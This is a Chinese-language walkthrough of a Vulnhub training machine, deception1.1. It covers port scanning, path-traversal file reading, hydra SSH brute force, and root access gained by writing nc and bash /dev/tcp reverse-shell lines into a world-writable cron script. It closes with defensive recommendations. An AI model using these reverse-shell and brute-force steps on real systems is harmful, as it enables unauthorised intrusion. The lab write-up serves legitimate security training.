haclabs: deception1.1 攻略（難度：初級+）

本篇是系列文章第二篇，比之上一篇《Vulnhub未知攻焉知防

》難度有所增加，更側(cè)重思路上的突破，講述如何通過信息收集獲取目標(biāo)系統(tǒng)關(guān)鍵信息，將會利用到信息泄露和任意文件讀取漏洞獲取敏感信息，然后構(gòu)造字典進(jìn)行ssh爆破拿到用戶密碼獲取權(quán)限，最后通過計劃任務(wù)提權(quán)拿到root權(quán)限。（PS：之后的系列文章都將在下面給出攻擊思路，并在最后給出相應(yīng)的防范措施，希望對攻擊還是防御感興趣的讀者，都能有所收獲）。

1、信息收集：

1）、對目標(biāo)IP進(jìn)行端口掃描，探測開放的端口及應(yīng)用，目標(biāo)主機(jī)開放了22端口和80端口。

2）、從80端口（web服務(wù)）入手，進(jìn)行目錄掃描，發(fā)現(xiàn)可用目錄，進(jìn)入web應(yīng)用中去測試信息泄露和其他web漏洞。根據(jù)信息泄露和文件讀取漏洞所發(fā)現(xiàn)的信息，后續(xù)進(jìn)行字典的構(gòu)造，再去爆破22端口的ssh密碼。最終拿到用戶名密碼，進(jìn)入目標(biāo)主機(jī)拿下第一個根據(jù)點。

2、提權(quán)：

拿到服務(wù)器權(quán)限后一般是低權(quán)限賬號，那么就需要提權(quán)，本次通過計劃任務(wù)反彈shell拿到root權(quán)限。提權(quán)后拿到root權(quán)限，本次攻擊就完成了。

備注：這里所有的掃描、測試和攻擊手段，都是通過一點一點的信息收集，然后采取相應(yīng)操作，得到一些結(jié)果，再基于這些結(jié)果線索，采取下一步操作，在行業(yè)內(nèi)都稱為信息收集。

用到的知識點、工具和漏洞：

• Kali linux：一款開源、集成了各種安全工具的linux操作系統(tǒng)，以下簡稱kali

• Nmap：一款開源的端口掃描器，用于端口掃描及服務(wù)識別

• Dirbuster：一款目錄掃描器，kali中自帶，用于目錄探測

• 信息泄露：信息收集中利用的漏洞，相關(guān)泄露信息會暴露系統(tǒng)的缺陷弱點

• 文件讀?。喝我馕募x取可用來讀取系統(tǒng)中任意文件，通過page=../../xxx.html的形式進(jìn)行遍歷，獲取系統(tǒng)敏感數(shù)據(jù)文件，危害巨大。

• Hydra爆破：hydra一款口令爆破工具，可用于爆破ssh、ftp、mysql、telent等應(yīng)用弱口令，kali中自帶該工具

• 計劃任務(wù)反彈shell：通過計劃任務(wù)的執(zhí)行文件中寫入反彈shell的代碼，在攻擊機(jī)中監(jiān)聽，可用于反彈shell，通俗點講就是拿到具有用戶權(quán)限的交互界面，如果該執(zhí)行文件是root創(chuàng)建的，那么拿到的就是root權(quán)限，以此類推。

靶機(jī)地址

靶機(jī)ip：192.168.43.82

Kaliip: 192.168.43.90（攻擊機(jī)）

解壓時需要密碼，靶機(jī)描述中有提示，算是作者給的小彩頭。

使用該字符串解密，發(fā)現(xiàn)失敗

該字符有點像MD5值，遂拿去解密，還是不正確

后來想到可能是16進(jìn)制，再次拿去解密

得到密碼，成功解壓，后續(xù)進(jìn)入正常環(huán)節(jié)

主機(jī)探測：netdiscover-i eth0 -r 192.168.43.0/24

端口探測及服務(wù)識別：nmap-sS -sV -T5 -A 192.168.43.82

當(dāng)前靶機(jī)開放了22和80端口，首先以80的web服務(wù)為突破口。

Ofcourse 先掃波目錄，這里使用的kali自帶的dirbuster

發(fā)現(xiàn)了首頁和manual目錄，manual目錄打開是apache的配置文檔，沒啥好利用的。先打開首頁index.html看看

這里是個密碼強(qiáng)度檢測器，先隨意輸入密碼提交試試

密碼要求至少8個字符，包括大小寫字母，1個數(shù)字，1個特殊字符，遂再次構(gòu)造密碼提交

提交后，彈出提示框，并輸出一句話，翻譯過來就是：密碼足夠強(qiáng)壯了，包含了大小寫字母，數(shù)字，特殊字符，這個withflag=1值得考慮，這里開始沒懂，以為就是提示的php頁面，直接拿去訪問

后來反應(yīng)過來，是將flag用1替換，感覺這急轉(zhuǎn)彎出的可以

提示找到password.txt，但該頁面無顯示，一般的做法就是查看下前端源碼，會有意外驚喜。

果不其然，這里提示使用page參數(shù)，應(yīng)該是利用文件讀取找到password.txt，于是構(gòu)造url進(jìn)行嘗試，最后找到password.txt文件

根據(jù)提示，用戶名為yash，密碼為ya5h**，后兩位忘記了，估計是構(gòu)造字典進(jìn)行爆破，猜測是數(shù)字或者字母組合，所以準(zhǔn)備先嘗試數(shù)字00-99，字母aa-zz,最后再嘗試數(shù)字字母混合組合。

這里大家可以自行嘗試，我這里在第二輪字母組合進(jìn)行爆破時，已經(jīng)發(fā)現(xiàn)了正確密碼。這里使用的爆破工具為hydra,使用命令如下

Hydra -l 用戶名-P 密碼字典目標(biāo)IP 協(xié)議

示例：hydra-l yash -P password.txt 192.168.43.82 ssh

下面就ssh登錄進(jìn)去

拿到y(tǒng)ash目錄下的flag

一串疑似base64編碼字符串,好奇心促使著我去解密一下

似乎得到了某種提示，于是又去訪問上述頁面，還使用了文件讀取去查詢該頁面，都沒有什么結(jié)果，后面復(fù)盤時發(fā)現(xiàn)我都已經(jīng)進(jìn)入系統(tǒng)了，只要考慮提權(quán)即可。

話不多說，下面需要進(jìn)行提權(quán)，因為剛得到的shell權(quán)限較低,得想辦法獲取高權(quán)限賬戶,最終獲取root權(quán)限。

cat /etc/passwd查看一下系統(tǒng)存在的用戶

下面是提權(quán)常規(guī)方法，沖呀

• Sudo -l 查詢具有sudo權(quán)限命令，然后提權(quán)

• SUID提權(quán),find / -perm -u=s -type f 2>/dev/null

• 通過在/etc/passwd添加一個root權(quán)限的賬戶進(jìn)行提權(quán),

• find / -writable -type f 2>/dev/null 查找可利用的可寫文件

• 內(nèi)核提權(quán)

• 其他

這里使用sudo-l 查詢有哪些sudo權(quán)限命令

看來此路不通

下一步，查看具有SUID執(zhí)行權(quán)限的文件

看來此路也不通

下一步，查看具有可寫權(quán)限文件

這里觀察到一個.sh文件，在yash用戶目錄下

ls-la 查看下該目錄下文件

該文件root具有執(zhí)行權(quán)限，其他用戶具有可寫權(quán)限,闊兮呀，如果能執(zhí)行的話，倒是能通過該文件提權(quán)

在其他目錄里也沒找到有用的信息，突然想起計劃任務(wù)也是能夠利用的，于是查看下計劃任務(wù)

Cat/etc/crontab

發(fā)現(xiàn)計劃任務(wù)里每分鐘執(zhí)行一次perm.sh文件，然后又是具有可寫權(quán)限的，這里就能夠利用來反彈shell，在文件里添加2條反彈shell的命令，加2條的原因是怕其中1個不起作用。

nc-e /bin/bash 192.168.43.90 1234

bash-i >& /dev/tcp/192.168.43.90/1234 0>&

然后kali監(jiān)聽1234端口，等待1分鐘。

等待一會，拿到shell，權(quán)限為root

讀取最后的flag

通過此篇攻防系列文章，信息安全防護(hù)總結(jié)如下：

1. 對于有關(guān)系統(tǒng)的敏感信息或測試信息盡量不要展示在前端或前端源碼中

2. 加密算法使用強(qiáng)加密算法，如（RSA、3DES、AES），避免使用弱加密算法，如(base64、md5等）

3. Ssh設(shè)置登錄次數(shù)限制，加強(qiáng)密碼復(fù)雜度（要求8位已上，含大小寫字母、數(shù)字、特殊字符三種及已上），避免使用跟公司單位掛鉤的密碼組合如（Shsnc123！@#）

4. 任意文件讀取漏洞防護(hù)：對于page、file等參數(shù)傳參時，應(yīng)過濾../../等非法字符，配置用戶輸入白名單

5. 計劃任務(wù)的執(zhí)行文件不能為root所創(chuàng)建，并且其他用戶不應(yīng)具有可寫權(quán)限。